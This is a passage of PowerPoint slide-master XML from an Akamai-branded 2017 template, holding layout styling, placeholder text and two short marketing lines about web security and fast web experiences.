          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="3391264"/>
            <a:ext cx="8322971" cy="501217"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="915897" indent="0">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7270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600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1147364" indent="242624">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3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58414" y="1554480"/>
            <a:ext cx="6461760" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3100"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1222195" indent="167796">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>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15200" y="1554480"/>
            <a:ext cx="6461760" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3100"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1222195" indent="167796">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756174" y="1554480"/>
            <a:ext cx="6461760" cy="5796916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3100"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:tabLst>
                <a:tab pos="165529" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403618" indent="170064">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1222195" indent="167796">
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:defRPr>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p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762753" y="2854024"/>
            <a:ext cx="7867650" cy="2017242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91431" tIns="45716" rIns="91431" bIns="45716" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="130609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j-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Avoid data theft and downtime by extending the </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>security perimeter outside the data-center and </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>protect from increasing frequency, scale and sophistication of web attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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466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Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762750" y="2898851"/>
            <a:ext cx="7545389" cy="2017242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91431" tIns="45716" rIns="91431" bIns="45716" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="130609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j-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="511176" y="428626"/>
            <a:ext cx="187325" cy="5937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30609" tIns="65305" rIns="130609" bIns="65305" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="130609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73161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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="823808" y="1508761"/>
            <a:ext cx="8731382" cy="5532120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54790" tIns="27391" rIns="54790" bIns="2739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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="778091" y="365766"/>
            <a:ext cx="11428512" cy="805816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54790" tIns="27391" rIns="54790" bIns="27391"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154460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243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29886"/>
            <a:ext cx="14630400" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="731523" y="457200"/>
            <a:ext cx="11775614" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130609" tIns="65305" rIns="130609" bIns="65305"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731520" y="1554480"/>
            <a:ext cx="13167360" cy="5796916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130609" tIns="65305" rIns="130609" bIns="65305" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="535258" y="454969"/>
            <a:ext cx="142736" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0096D6"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130609" tIns="65305" rIns="130609" bIns="65305" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="130609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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="4533518" y="7824216"/>
            <a:ext cx="5608320" cy="405384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130609" tIns="65305" rIns="130609" bIns="65305" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="1306090" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>©2017 AKAMAI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>  |  FASTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> FORWARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" baseline="34000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>TM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="New_Akamai_Logo_RGB.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="10479" t="21844" r="9471" b="17195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12633447" y="381939"/>
            <a:ext cx="1470562" cy="6302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6" r:id="rId4"/>
    <p:sldLayoutId id="2147483681" r:id="rId5"/>
    <p:sldLayoutId id="2147483682" r:id="rId6"/>
    <p:sldLayoutId id="2147483683" r:id="rId7"/>
    <p:sldLayoutId id="2147483686" r:id="rId8"/>
    <p:sldLayoutId id="2147483688" r:id="rId9"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3400">
          <a:solidFill>
            <a:srgbClr val="191919"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="653044" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="1306090" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1959135" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2612181" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="902471"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08" indent="-174608"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0" indent="165529" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="FF9900"/>
        </a:buClr>
        <a:buChar char="•"/>
        <a:defRPr sz="1700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="0" indent="165529" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="FF9900"/>
        </a:buClr>
        <a:buChar char="•"/>
        <a:tabLst>
          <a:tab pos="487517" algn="l"/>
          <a:tab pos="1147364" algn="l"/>
        </a:tabLst>
        <a:defRPr sz="1700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="0" indent="165529" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="FF9900"/>
        </a:buClr>
        <a:buChar char="•"/>
        <a:tabLst>
          <a:tab pos="487517" algn="l"/>
          <a:tab pos="1147364" algn="l"/>
        </a:tabLst>
        <a:defRPr sz="1700">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="573683" indent="-170064"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01" indent="-158725"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89989" indent="-167796"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0882" indent="-326522" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="FF9900"/>
        </a:buClr>
        <a:buChar char="•"/>
        <a:defRPr sz="2300">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:defPPr>
        <a:defRPr lang="en-US"/>
      </a:defPPr>
      <a:lvl1pPr marL="0" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="653044" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1306090" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1959135" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2612181" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="3265225" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="2600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3918270" algn="l" defTabSz="1306090" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
